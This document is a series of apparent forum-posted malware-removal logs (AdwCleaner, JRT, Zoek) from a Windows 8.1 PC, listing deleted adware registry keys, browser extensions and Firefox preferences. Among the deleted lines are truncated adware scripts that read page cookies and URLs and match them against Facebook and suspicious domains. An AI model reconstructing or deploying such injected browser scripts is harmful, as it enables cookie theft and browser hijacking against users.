Key Deleted : HKLM\Software\Uniblue
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Search Protection
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F488658-35A7-2AB8-A756-560BA8F103C3}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E55B3271-7CA8-4D0C-AE06-69A24856E996}_is1
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SearchProtect
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\fst_gb_31_is1
Data Deleted : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] - c:\progra~2\searchprotect\searchprotect\bin\spvc32loader.dll
Data Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] - C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17037


-\\ Mozilla Firefox v29.0.1 (en-GB)

[ File : C:\Users\paulj_000\AppData\Roaming\Mozilla\Firefox\Profiles\f7t4qr94.default\prefs.js ]

Line Deleted : user_pref("extensions.5GaH.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.ne[...]
Line Deleted : user_pref("extensions.Zow.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net[...]

[ File : C:\Users\Sarah\AppData\Roaming\Mozilla\Firefox\Profiles\bsba1crn.default\prefs.js ]

Line Deleted : user_pref("extensions.5GaH.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.ne[...]
Line Deleted : user_pref("extensions.Zow.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net[...]

-\\ Google Chrome v35.0.1916.114

[ File : C:\Users\paulj_000\AppData\Local\Google\Chrome\User Data\Default\preferences ]

Deleted [Extension] : booedmolknjekdopkepjjeckmjkdpfgl
Deleted [Extension] : bopakagnckmlgajfccecajhnimjiiedh
Deleted [Extension] : effalkbfcccbfoockmapkhkmkijlfmbh
Deleted [Extension] : flpcjncodpafbgdpnkljologafpionhb

[ File : C:\Users\Sarah\AppData\Local\Google\Chrome\User Data\Default\preferences ]

Deleted [Extension] : booedmolknjekdopkepjjeckmjkdpfgl
Deleted [Extension] : bopakagnckmlgajfccecajhnimjiiedh
Deleted [Extension] : effalkbfcccbfoockmapkhkmkijlfmbh
Deleted [Extension] : flpcjncodpafbgdpnkljologafpionhb
Deleted [Extension] : kpmobbbkiifncejmggdjbhcapfmacgeb

*************************

AdwCleaner[R0].txt - [12644 octets] - [09/06/2014 17:43:00]
AdwCleaner[S0].txt - [11227 octets] - [09/06/2014 18:32:37]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [11288 octets] ##########

 

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.1.4 (04.06.2014:1)
OS: Windows 8.1 x64
Ran by paulj_000 on 09/06/2014 at 18:46:47.22
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services



~~~ Registry Values

Successfully deleted: [Registry Value] HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\searchprotection
Successfully repaired: [Registry Value] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL



~~~ Registry Keys

Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{C1A6073E-F20A-4276-BBAE-47686849F1B1}
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\SearchScopes\{9CB96984-43C3-4D44-90EF-01466EFCF7BB}
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\SearchScopes\{C1A6073E-F20A-4276-BBAE-47686849F1B1}



~~~ Files



~~~ Folders



~~~ FireFox

Successfully deleted the following from C:\Users\paulj_000\AppData\Roaming\mozilla\firefox\profiles\f7t4qr94.default\prefs.js

user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.monetization_plugin_bundledUrls.value", "%7B%22dealply_s%22%3A
user_pref("extensions.crossrider.bic", "14681b5b4956c0cd8f84ae5ef80bad95");
Emptied folder: C:\Users\paulj_000\AppData\Roaming\mozilla\firefox\profiles\f7t4qr94.default\minidumps [3 files]



~~~ Event Viewer Logs were cleared





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 09/06/2014 at 19:02:48.66
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

 

 

 

 

Zoek.exe v5.0.0.0 Updated 02-June-2014
Tool run by paulj_000 on 09/06/2014 at 19:05:19.13.
Microsoft Windows 8.1 6.3.9600  x64
Running in: Normal Mode Internet Access Detected
Launched: C:\Users\paulj_000\Downloads\zoek.exe
Script used: C:\Users\paulj_000\Downloads\zoekscript.txt

==== Older Logs ======================

C:\zoek-results2014-06-05-162111.log    19395 bytes

==== System Restore Info ======================

09/06/2014 19:06:46 Zoek.exe System Restore Point Created Succesfully.

==== Deleting CLSID Registry Keys ======================

HKEY_USERS\S-1-5-21-3242301468-3912853311-3031073808-1003\Software\Microsoft\Internet Explorer\SearchScopes\{D944BB61-2E34-4DBF-A683-47E505C587DC} deleted successfully
HKEY_USERS\S-1-5-21-3242301468-3912853311-3031073808-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DB458257-B25C-8DD6-DBA9-285ED6951694} deleted successfully
HKEY_USERS\S-1-5-21-3242301468-3912853311-3031073808-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{DB458257-B25C-8DD6-DBA9-285ED6951694} deleted successfully
HKEY_USERS\S-1-5-21-3242301468-3912853311-3031073808-1003\Software\Microsoft\Internet Explorer\SearchScopes\{7C53F0B8-083A-47A5-8DEE-FF74C88B5A9A} deleted successfully
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{DB458257-B25C-8DD6-DBA9-285ED6951694} deleted successfully
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{DB458257-B25C-8DD6-DBA9-285ED6951694} deleted successfully
HKEY_CLASSES_ROOT\CLSID\{DB458257-B25C-8DD6-DBA9-285ED6951694} deleted successfully
HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{DB458257-B25C-8DD6-DBA9-285ED6951694} deleted successfully

==== Deleting CLSID Registry Values ======================


==== Installed Programs ======================

æTorrent  
7-Zip 9.20 (x64 edition)  
Adobe Flash Player 13 Plugin  
Adobe Shockwave Player 12.0  
Aloha TriPeaks  
avast Free Antivirus  
Bejeweled 3  
Bonjour  
Build-a-lot  
Classic Shell  
Cradle of Rome 2  
Crazy Chicken Soccer  
CyberLink LabelPrint  
CyberLink Media Suite 10  
CyberLink Power2Go 8  
CyberLink PowerDVD 12  
CyberLink YouCam  
D3DX10  
DisableMSDefender  
Energy Star  
Farm Frenzy  
Free_Ven_s_pro 25  
Google Chrome  
Google Toolbar for Internet Explorer  
Google Update Helper  
Governor of Poker 2 Premium Edition  
Hewlett-Packard ACLM.NET v1.2.2.3  
HP Connected Music (Meridian - installer)  
HP Customer Experience Enhancements  
HP Documentation  
HP Postscript Converter  
HP Recovery Manager  
HP Registration Service  
HP SimplePass  
HP Support Assistant  
HP System Event Utility  
HP Utility Center  
HP Wireless Button Driver  
Inst5675  
Inst5676  
Intel® Processor Graphics  
Intel® Trusted Execution Engine  
Intel® Trusted Execution Engine Driver  
Jewel Match 3  
Mahjongg Artifacts  
Mediaa_Play_AIR_1.4  
Microsoft Application Error Reporting  
Microsoft Office  
Microsoft Silverlight  
Microsoft SQL Server 2005 Compact Edition [ENU]  
Microsoft Visual C++ 2005 Redistributable  
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17  
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161  
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17  
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148  
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161  
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219  
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219  
Movie Maker  
Mozilla Firefox 29.0.1 (x86 en-GB)  
Mozilla Maintenance Service  
MSVCRT  
MSVCRT110  
MSVCRT110_amd64  
Photo Common  
Photo Gallery  
Plants vs. Zombies - Game of the Year  
Polar Bowler  
Qualcomm Atheros Bluetooth Suite (64)  
Qualcomm Atheros Driver Installation Program  
Ranch Rush 2 - Premium Edition  
Realtek Card Reader  
Realtek Ethernet Controller All-In-One Windows Driver  
Realtek High Definition Audio Driver  
swMSM  
Synaptics Pointing Device Driver  
Trinklit Supreme  
Update Installer for WildTangent Games App  
Vacation QuestT - Australia  
Virtual Families  
VLC media player 2.1.3  
Wedding Dash  
WildTangent Games  
WildTangent Games App (HP Games)  
Windows Live Communications Platform  
Windows Live Essentials  
Windows Live Installer  
Windows Live Photo Common  
Windows Live PIMT Platform  
Windows Live SOXE  
Windows Live SOXE Definitions  
Windows Live UX Platform  
Windows Live UX Platform Language Pack  
Zuma's Revenge  

==== Running Processes ======================

C:\Program Files\AVAST Software\Avast\AvastSvc.exe
C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe
C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe
C:\Program Files\AVAST Software\Avast\avastui.exe
C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSMonitorServicePDVD12.exe
C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe
C:\Windows\SysWOW64\notepad.exe
C:\Users\paulj_000\Downloads\zoek.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe

==== Services (whitelist) ======================
Powered by E Dev

R2 - [AERTFilters] - Andrea RT Filters Service - C:\Program Files\Realtek\Audio\HDA\AERTSr64.EXE
R2 - [AtherosSvc] - AtherosSvc - "C:\Program Files (x86)\Bluetooth Suite\adminservice.exe"
R2 - [Bonjour Service] - Bonjour Service - "C:\Program Files\Bonjour\mDNSResponder.exe"
R2 - [Cachedrv server] -  HP SimplePass Cachedrv Service - "C:\Program Files\Hewlett-Packard\SimplePass\cachesrvr.exe"
R2 - [HP Support Assistant Service] - HP Support Assistant Service - "C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe"
R2 - [Intel® Capability Licensing Service Interface] - Intel® Capability Licensing Service Interface - "C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe"
R2 - [omniserv] -  HP SimplePass Service - C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe
R2 - [RtkAudioService] - Realtek Audio Service - C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
R2 - [WSearch] - Windows Search - C:\Windows\system32\SearchIndexer.exe /Embedding
S2 - [gupdate] - Google Update Service (gupdate) - "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
S2 - [sppsvc] - Software Protection - C:\Windows\system32\sppsvc.exe
S3 - [AdobeFlashPlayerUpdateSvc] - Adobe Flash Player Update Service - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
S3 - [ALG] - Application Layer Gateway Service - C:\Windows\System32\alg.exe
S3 - [aspnet_state] - ASP.NET State Service - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
S3 - [COMSysApp] - COM+ System Application - C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
S3 - [cphs] - Intel® Content Protection HECI Service - C:\Windows\SysWow64\IntelCpHeciSvc.exe
S3 - [Fax] - Fax - C:\Windows\system32\fxssvc.exe
S3 - [FontCache3.0.0.0] - Windows Presentation Foundation Font Cache 3.0.0.0 - C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
S3 - [GamesAppService] - GamesAppService - "C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe"
S3 - [gupdatem] - Google Update Service (gupdatem) - "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc
S3 - [gusvc] - Google Software Updater - "C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe"
S3 - [hpqwmiex] - HP Software Framework Service - "C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe"
S3 - [ICCS] - Intel® Integrated Clock Controller Service - Intel® ICCS - "C:\Program Files (x86)\Intel\Intel® Integrated Clock Controller Service\ICCProxy.exe"
S3 - [IEEtwCollectorService] - Internet Explorer ETW Collector Service - C:\Windows\system32\IEEtwCollector.exe /V
S3 - [Intel® Capability Licensing Service TCP IP Interface] - Intel® Capability Licensing Service TCP IP Interface - "C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe"
S3 - [MozillaMaintenance] - Mozilla Maintenance Service - "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
S3 - [MSDTC] - Distributed Transaction Coordinator - C:\Windows\System32\msdtc.exe
S3 - [msiserver] - Windows Installer - C:\Windows\system32\msiexec.exe /V
S3 - [PerfHost] - Performance Counter DLL Host - C:\Windows\SysWow64\perfhost.exe
S3 - [RpcLocator] - Remote Procedure Call (RPC) Locator - C:\Windows\system32\locator.exe
S3 - [SNMPTRAP] - SNMP Trap - C:\Windows\System32\snmptrap.exe
S3 - [TrustedInstaller] - Windows Modules Installer - C:\Windows\servicing\TrustedInstaller.exe
S3 - [vds] - Virtual Disk - C:\Windows\System32\vds.exe
S3 - [VSS] - Volume Shadow Copy - C:\Windows\system32\vssvc.exe
S3 - [wbengine] - Block Level Backup Engine Service - "C:\Windows\system32\wbengine.exe"
S3 - [WdNisSvc] - Windows Defender Network Inspection Service - "C:\Program Files\Windows Defender\NisSrv.exe"
S3 - [WinDefend] - Windows Defender Service - "C:\Program Files\Windows Defender\MsMpEng.exe"
S3 - [wmiApSrv] - WMI Performance Adapter - C:\Windows\system32\wbem\WmiApSrv.exe
S3 - [WMPNetworkSvc] - Windows Media Player Network Sharing Service - "C:\Program Files\Windows Media Player\wmpnetwk.exe"

==== Deleting Services ======================


==== FireFox Fix ======================

Deleted from C:\Users\PAULJ_~1\AppData\Roaming\Mozilla\Firefox\Profiles\f7t4qr94.default\prefs.js:
user_pref("browser.startup.homepage", "www.google.com");
user_pref("keyword.URL", "http://uk.search.yah...pe=903578&p=");

Added to C:\Users\PAULJ_~1\AppData\Roaming\Mozilla\Firefox\Profiles\f7t4qr94.default\prefs.js:
user_pref("browser.startup.homepage", "http://www.google.com");
user_pref("browser.search.defaulturl", "http://www.google.co...le Search&q=");
user_pref("browser.newtab.url", "http://www.google.com/");
user_pref("browser.search.defaultengine", "Google");
user_pref("browser.search.defaultenginename", "Google");
user_pref("browser.search.selectedEngine", "Google");
user_pref("browser.search.order.1", "Google");
user_pref("keyword.URL", "http://www.google.co...le Search&q=");
user_pref("browser.search.suggest.enabled", true);
user_pref("browser.search.useDBForOrder", true);

Deleted from C:\Users\Sarah\AppData\Roaming\Mozilla\Firefox\Profiles\bsba1crn.default\prefs.js:
user_pref("browser.startup.homepage", "http://www.msn.com/?pc=AV01");
user_pref("browser.search.defaulturl", "http://www.bing.com/search");
user_pref("browser.search.defaultengine", "Microsoft (Bing)");
user_pref("browser.search.defaultenginename", "Microsoft (Bing)");
user_pref("browser.search.selectedEngine", "Microsoft (Bing)");
user_pref("browser.search.order.1", "Microsoft (Bing)");
user_pref("keyword.URL", "http://www.bing.com/search");

Added to C:\Users\Sarah\AppData\Roaming\Mozilla\Firefox\Profiles\bsba1crn.default\prefs.js:
user_pref("browser.startup.homepage", "http://www.google.com");
user_pref("browser.search.defaulturl", "http://www.google.co...le Search&q=");
user_pref("browser.newtab.url", "http://www.google.com/");
user_pref("browser.search.defaultengine", "Google");
user_pref("browser.search.defaultenginename", "Google");
user_pref("browser.search.selectedEngine", "Google");
user_pref("browser.search.order.1", "Google");
user_pref("keyword.URL", "http://www.google.co...le Search&q=");
user_pref("browser.search.suggest.enabled", true);
user_pref("browser.search.useDBForOrder", true);

ProfilePath: C:\Users\PAULJ_~1\AppData\Roaming\Mozilla\Firefox\Profiles\f7t4qr94.default

user.js not found
---- Lines wajam removed from prefs.js ----
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.monetization_plugin_bundledUrls.value
---- Lines afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488 removed from prefs.js ----
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.active", true);
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.addressbar", "NA");
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.addressbarenhanced", "");
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e9
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e9
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.asyncdb.was_copied", "true");
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.asyncdb_dbWasSet", true);
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.asyncdb_dbWasSet_FF25_FIX", true);
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.asyncinternaldb.was_copied", "true");
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.asyncinternaldb_dbWasSet", true);
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.asyncinternaldb_dbWasSet_FF25_FIX", true);
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.backgroundver", 2);
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.certdomaininstaller", "");
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.changeprevious", false);
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.cookie.InstallationTime.expiration", "Fri Feb 01
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.cookie.InstallationTime.value", "%221402291749%2
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.cookie.InstallerParams.expiration", "Fri Feb 01
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.cookie.InstallerParams.value", "%7B%22source_id%
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.description", "MediaPlayer widget");
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.domain", "");
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.enablesearch", false);
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.homepage", "");
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.iframe", false);
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.InstallationThankYouPage", false);
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.InstallationTime", 1402291749);
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.__defualt_browser__.expiration", "Fri
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.__defualt_browser__.value", "%22ch%22
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb._installer_additional_info.expiration
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb._installer_additional_info.value", "%
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.installer.expiration", "Fri Feb 01 20
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.installer.value", "%7B%22InstallerIde
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.InstallerIdentifiers.expiration", "Fr
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.InstallerIdentifiers.value", "%7B%22i
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.InstallerParams.expiration", "Fri Feb
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.InstallerParams.value", "%7B%22source
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.InstallerParamsCache.expiration", "Fr
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.InstallerParamsCache.value", "%7B%22s
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.InstallerUserIdentifiersCache.expirat
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.InstallerUserIdentifiersCache.value",
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.monetization_plugin_bundledUrls.expir
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.monetization_plugin_bundledWithHash.e
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.monetization_plugin_bundledWithHash.v
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.monetization_plugin_last_executable_r
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.monetization_plugin_last_executable_r
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.monetization_plugin_notBundledArr_.ex
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.monetization_plugin_notBundledArr_.va
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.Resources_appVer.expiration", "Fri Fe
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.Resources_appVer.value", "12");
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.Resources_lastVersion.expiration", "F
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.Resources_lastVersion.value", "1");
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.Resources_meta.expiration", "Fri Feb
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.Resources_meta.value", "%7B%7D");
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.Resources_nextCheck.expiration", "Tue
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.Resources_nextCheck.value", "true");
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.Resources_queue.expiration", "Fri Feb
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.Resources_queue.value", "%7B%7D");
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.Resources_remote_resources.expiration
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.internaldb.Resources_remote_resources.value", "%
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.lastDailyReport", "1402335512450");
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.lastUpdate", "1402335512141");
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.manifesturl", "");
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.name", "Mediaa_Play_AIR_1.4");
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.newtab", "");
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.opensearch", "");
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.pluginsurl", "http://js.datademoserv.com/plugin/
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.pluginsversion", 6);
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.publisher", "enter");
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.searchstatus", 0);
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.setnewtab", false);
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.thankyou", "");
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.updateinterval", 360);
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.58488.ver", 12);
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.apps", "58488");
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.bic", "14681b5b4956c0cd8f84ae5ef80bad95");
